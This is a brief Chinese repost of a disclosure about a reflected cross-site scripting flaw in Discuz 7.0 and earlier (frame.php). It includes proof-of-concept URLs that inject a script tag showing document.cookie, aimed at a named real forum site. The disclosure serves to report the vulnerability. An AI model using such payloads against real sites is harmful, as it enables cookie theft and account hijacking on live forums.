| 关键词: http cctv nbsp 原文 bbs php com patching ocument frameon |
原文: Discuz <=7.0(frame.php) xss Vulnerability 前段时间做风险评估的时候发现的,这个xss 需要在开启了左右分栏的情况下才可以触发。 PoC: 程序代码 http://bbs.cctv.com/index.php?gid=24″></iframe><script>alert(document.cookie)</script> —–> 跳转到了 程序代码 http://bbs.cctv.com/frame.php?frameon=yes&referer=http%3A//bbs.cctv.com/index.php%3Fgid%3D24%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 转帖自: http://www.patching.net/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|